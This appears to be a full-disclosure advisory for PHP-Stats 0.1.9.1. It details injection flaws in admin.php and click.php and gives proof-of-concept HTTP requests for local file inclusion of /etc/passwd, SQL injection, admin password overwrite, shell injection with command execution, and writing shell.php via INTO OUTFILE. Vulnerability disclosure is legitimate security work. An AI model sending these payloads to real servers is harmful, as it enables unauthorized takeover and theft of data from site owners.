------------- PHP-Stats <= 0.1.9.1 remote commands execution ------------------- software: site: http://www.phpstats.net/ description: Open source statistical package for PHP enabled web sites -------------------------------------------------------------------------------- i) vulnerable code in admin.php (and in nearly every scripts...) at line 65: ... if(isset($_POST['option'])) { while (list ($key, $value) = each ($tmpOption)) $option[$key]=$value; } ... you can overwrite at run-time the "option[]" array..., raising SQL injection, arbitrary local inclusion and php injection issues, poc: i.a) arbitrary local inclusion (with magic_quotes_gpc off): i.a1) POST [path]admin.php?do=0 HTTP/1.1\r\n"; Content-Type: application/x-www-form-urlencoded Host: [somehost] Content-Length: [data_length] Connection: Close option=&option[clear_cache]=1&option[language]=../../../../../../etc/passwd[null char] i.a2) POST [path]admin.php?do=0 HTTP/1.1\r\n"; Content-Type: application/x-www-form-urlencoded Host: [somehost] Content-Length: [data_length] Connection: Close option=&option[template]=../../../../../../etc/passwd[null char] i.b) SQL injection - you can inject arbitrary SQL commands through the table prefix, regardless of magic_quotes_gpc settings: POST [path]admin.php?do=0 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: [somehost] Content-Length: [data_length] Connection: Close option=&option[prefix]=[SQL] i.c) PHP code injection - you can grant administrative privileges, overwriting "option[admin_pass]" value and building a MD5 admin cookie on new value. Now you can inject a shell in two different ways by administrative features, poc: i.c1) POST [path]admin.php?action=esclusioni&opzioni=excfol HTTP/1.1 Content-Type: application/x-www-form-urlencoded Cookie: php_stats_cache=1; pass_cookie=[md5 hash of "suntzu"] Host: [somehost] Content-Length: [data_length] Connection: Close option=&option[admin_pass]=suntzu&option_new=[SHELL] now you can launch commands including option/php-stats-options.php script,poc: POST [path]admin.php?cmd=netstat%20-ano&do=0 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: [somehost] Content-Length: [data_length] Connection: Close option=&option[language]=../option/php-stats-options.php[null char] i.c2) the most chritical, this works regardless of any php.ini settings, you can inject a shell in config.php and launch commands from it. Poc exploit here: http://retrogod.altervista.org/php_stats_0191_xpl.html -------------------------------------------------------------------------------- ii) vulnerable code in click.php at line 18: ... if(isset($_SERVER['REMOTE_ADDR'])) $ip=(isset($_SERVER['HTTP_PC_REMOTE_ADDR']) ? $_SERVER['HTTP_PC_REMOTE_ADDR'] : $_SERVER['REMOTE_ADDR']); ... and line 65: ... $result=sql_query("SELECT visitor_id FROM $option[prefix]_cache WHERE user_id='$ip' LIMIT 1"); ... you can inject sql commands through PC_REMOTE_ADDR http header, poc: GET [path]click.php?id=1&get=1 HTTP/1.1 PC_REMOTE_ADDR: 'UNION SELECT '[code]'INTO OUTFILE 'shell.php' FROM php_stats_cache/* Host: [host] Connection: Close -------------------------------------------------------------------------------- iii) information disclosure, you can go to: http://[target]/[path]/checktables.php to see at screen database table_prefix, making easier the exploitation process... -------------------------------------------------------------------------------- rgod site: http://retrogod.altervista.org mail: rgod at autistici.org original advisory: http://retrogod.altervista.org/php_stats_0191_adv.html --------------------------------------------------------------------------------